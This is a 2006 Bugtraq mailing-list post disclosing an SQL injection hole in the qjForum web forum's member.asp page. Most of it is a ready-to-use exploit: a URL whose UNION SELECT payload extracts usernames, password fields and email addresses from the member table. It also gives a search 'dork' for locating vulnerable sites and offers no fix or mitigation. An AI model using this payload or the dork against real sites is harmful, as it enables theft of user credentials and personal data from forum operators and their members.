
Date: 25 May 2006 08:27:08 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: qjForum(member.asp) SQL Injection Vulnerability


Pls qjForum to Register and Log &#304;n

# Title  :   qjForum(member.asp) SQL Injection Vulnerability

# Author :   ajann

# Dork   :   "qjForum"

# Exploit;

SQL--------------------------------------------------------

### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member

# ajann,Turkey



